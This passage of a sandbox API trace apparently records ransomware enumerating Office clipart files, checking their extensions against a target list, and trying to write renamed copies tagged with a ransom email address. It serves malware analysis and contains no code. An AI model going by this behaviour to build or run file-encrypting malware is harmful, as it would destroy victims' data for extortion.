Office\\root\\CLIPART\\PUB60COR\\SO00943_.WMF") returned 68 [0174.119] lstrlenW (lpString=".1cd") returned 4 [0174.119] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0174.119] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00943_.WMF") returned 68 [0174.119] lstrlenW (lpString=".jpg") returned 4 [0174.119] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0174.120] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0174.120] lstrlenW (lpString="SO01044_.WMF") returned 12 [0174.120] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01044_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so01044_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x438 [0174.121] GetFileSizeEx (in: hFile=0x438, lpFileSize=0x38bff14 | out: lpFileSize=0x38bff14*=44570) returned 1 [0174.121] CloseHandle (hObject=0x438) returned 1 [0174.121] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01044_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so01044_.wmf")) returned 0x220 [0174.121] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01044_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so01044_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0174.122] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01044_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so01044_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x438 [0174.122] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0174.122] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0174.122] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01044_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so01044_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.123] CloseHandle (hObject=0x438) returned 1 [0174.123] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01044_.WMF") returned 68 [0174.123] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01044_.WMF") returned 68 [0174.123] lstrlenW (lpString=".doc") returned 4 [0174.123] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0174.123] lstrlenW (lpString=".docx") returned 5 [0174.123] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0174.123] lstrlenW (lpString=".pdf") returned 4 [0174.123] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0174.123] lstrlenW (lpString=".xls") returned 4 [0174.123] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0174.123] lstrlenW (lpString=".xlsx") returned 5 [0174.124] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0174.124] lstrlenW (lpString=".ppt") returned 4 [0174.124] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0174.124] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01044_.WMF") returned 68 [0174.124] lstrlenW (lpString=".zip") returned 4 [0174.124] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0174.124] lstrlenW (lpString=".rar") returned 4 [0174.124] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0174.124] lstrlenW (lpString=".bz2") returned 4 [0174.124] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0174.124] lstrlenW (lpString=".7z") returned 3 [0174.124] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0174.124] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01044_.WMF") returned 68 [0174.124] lstrlenW (lpString=".dbf") returned 4 [0174.124] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0174.124] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01044_.WMF") returned 68 [0174.124] lstrlenW (lpString=".1cd") returned 4 [0174.124] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0174.124] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01044_.WMF") returned 68 [0174.124] lstrlenW (lpString=".jpg") returned 4 [0174.124] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0174.124] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01044_.WMF") returned 68 [0174.124] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01044_.WMF") returned 68 [0174.124] lstrlenW (lpString=".doc") returned 4 [0174.124] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0174.124] lstrlenW (lpString=".docx") returned 5 [0174.125] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0174.125] lstrlenW (lpString=".pdf") returned 4 [0174.125] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0174.125] lstrlenW (lpString=".xls") returned 4 [0174.125] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0174.125] lstrlenW (lpString=".xlsx") returned 5 [0174.125] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0174.125] lstrlenW (lpString=".ppt") returned 4 [0174.125] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0174.125] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01044_.WMF") returned 68 [0174.125] lstrlenW (lpString=".zip") returned 4 [0174.125] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0174.125] lstrlenW (lpString=".rar") returned 4 [0174.125] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0174.125] lstrlenW (lpString=".bz2") returned 4 [0174.125] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0174.125] lstrlenW (lpString=".7z") returned 3 [0174.125] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0174.125] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01044_.WMF") returned 68 [0174.125] lstrlenW (lpString=".dbf") returned 4 [0174.125] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0174.125] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01044_.WMF") returned 68 [0174.125] lstrlenW (lpString=".1cd") returned 4 [0174.125] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0174.125] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01044_.WMF") returned 68 [0174.125] lstrlenW (lpString=".jpg") returned 4 [0174.125] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0174.126] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0174.126] lstrlenW (lpString="SO01063_.WMF") returned 12 [0174.126] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01063_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so01063_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x438 [0174.126] GetFileSizeEx (in: hFile=0x438, lpFileSize=0x38bff14 | out: lpFileSize=0x38bff14*=23352) returned 1 [0174.126] CloseHandle (hObject=0x438) returned 1 [0174.127] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01063_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so01063_.wmf")) returned 0x220 [0174.127] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01063_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so01063_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0174.127] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01063_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so01063_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x438 [0174.127] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0174.127] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0174.127] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01063_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so01063_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.128] CloseHandle (hObject=0x438) returned 1 [0174.535] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01063_.WMF") returned 68 [0174.535] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01063_.WMF") returned 68 [0174.535] lstrlenW (lpString=".doc") returned 4 [0174.538] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0174.538] lstrlenW (lpString=".docx") returned 5 [0174.538] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0174.538] lstrlenW (lpString=".pdf") returned 4 [0174.538] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0174.538] lstrlenW (lpString=".xls") returned 4 [0174.538] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0174.538] lstrlenW (lpString=".xlsx") returned 5 [0174.538] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0174.538] lstrlenW (lpString=".ppt") returned 4 [0174.538] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0174.538] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01063_.WMF") returned 68 [0174.538] lstrlenW (lpString=".zip") returned 4 [0174.538] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0174.538] lstrlenW (lpString=".rar") returned 4 [0174.538] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0174.538] lstrlenW (lpString=".bz2") returned 4 [0174.538] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0174.538] lstrlenW (lpString=".7z") returned 3 [0174.539] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0174.539] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01063_.WMF") returned 68 [0174.539] lstrlenW (lpString=".dbf") returned 4 [0174.539] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0174.539] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01063_.WMF") returned 68 [0174.539] lstrlenW (lpString=".1cd") returned 4 [0174.539] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0174.539] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01063_.WMF") returned 68 [0174.539] lstrlenW (lpString=".jpg") returned 4 [0174.539] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0174.539] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01063_.WMF") returned 68 [0174.539] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01063_.WMF") returned 68 [0174.539] lstrlenW (lpString=".doc") returned 4 [0174.539] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0174.539] lstrlenW (lpString=".docx") returned 5 [0174.539] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0174.539] lstrlenW (lpString=".pdf") returned 4 [0174.539] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0174.539] lstrlenW (lpString=".xls") returned 4 [0174.540] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0174.540] lstrlenW (lpString=".xlsx") returned 5 [0174.540] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0174.540] lstrlenW (lpString=".ppt") returned 4 [0174.540] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0174.540] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01063_.WMF") returned 68 [0174.540] lstrlenW (lpString=".zip") returned 4 [0174.540] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0174.540] lstrlenW (lpString=".rar") returned 4 [0174.540] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0174.540] lstrlenW (lpString=".bz2") returned 4 [0174.540] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0174.540] lstrlenW (lpString=".7z") returned 3 [0174.540] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0174.540] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01063_.WMF") returned 68 [0174.540] lstrlenW (lpString=".dbf") returned 4 [0174.540] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0174.540] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01063_.WMF") returned 68 [0174.540] lstrlenW (lpString=".1cd") returned 4 [0174.540] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0174.540] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01063_.WMF") returned 68 [0174.541] lstrlenW (lpString=".jpg") returned 4 [0174.541] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0174.541] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0174.541] lstrlenW (lpString="SY00795_.WMF") returned 12 [0174.541] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SY00795_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sy00795_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x52c [0174.542] GetFileSizeEx (in: hFile=0x52c, lpFileSize=0x38bff14 | out: lpFileSize=0x38bff14*=10084) returned 1 [0174.542] CloseHandle (hObject=0x52c) returned 1 [0174.542] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SY00795_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sy00795_.wmf")) returned 0x220 [0174.542] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SY00795_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sy00795_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0174.542] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SY00795_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sy00795_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x52c [0174.543] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0174.543] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0174.543] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SY00795_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sy00795_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.543] CloseHandle (hObject=0x52c) returned 1 [0174.544] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SY00795_.WMF") returned 68 [0174.544] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SY00795_.WMF") returned 68 [0174.544] lstrlenW (lpString=".doc") returned 4 [0174.544] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0174.544] lstrlenW (lpString=".docx") returned 5 [0174.544] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0174.544] lstrlenW (lpString=".pdf") returned 4 [0174.544] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0174.544] lstrlenW (lpString=".xls") returned 4 [0174.544] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0174.544] lstrlenW (lpString=".xlsx") returned 5 [0174.544] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0174.544] lstrlenW (lpString=".ppt") returned 4 [0174.544] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0174.544] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SY00795_.WMF") returned 68 [0174.544] lstrlenW (lpString=".zip") returned 4 [0174.544] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0174.544] lstrlenW (lpString=".rar") returned 4 [0174.544] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0174.544] lstrlenW (lpString=".bz2") returned 4 [0174.544] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0174.545] lstrlenW (lpString=".7z") returned 3 [0174.545] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0174.545] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SY00795_.WMF") returned 68 [0174.545] lstrlenW (lpString=".dbf") returned 4 [0174.545] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0174.547] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0174.547] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0174.547] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SY00882_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sy00882_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.548] CloseHandle (hObject=0x52c) returned 1 [0174.549] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0174.549] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0174.549] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SY01006_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sy01006_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.549] CloseHandle (hObject=0x52c) returned 1 [0174.550] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0174.550] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0174.550] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SY01252_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sy01252_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.551] CloseHandle (hObject=0x52c) returned 1 [0174.553] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0174.553] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0174.553] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SY01253_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sy01253_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.554] CloseHandle (hObject=0x52c) returned 1 [0174.557] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0174.557] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0174.557] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SY01462_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sy01462_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.558] CloseHandle (hObject=0x52c) returned 1 [0174.559] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0174.559] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0174.559] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SY01491_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sy01491_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.560] CloseHandle (hObject=0x52c) returned 1 [0174.564] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0174.564] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0174.564] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SY01563_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sy01563_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.565] CloseHandle (hObject=0x52c) returned 1 [0174.566] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0174.567] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0174.567] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SY01572_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sy01572_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.567] CloseHandle (hObject=0x52c) returned 1 [0174.568] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0174.568] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0174.569] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SY01590_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sy01590_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.569] CloseHandle (hObject=0x52c) returned 1 [0174.571] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0174.571] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0174.571] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TAIL.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tail.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, 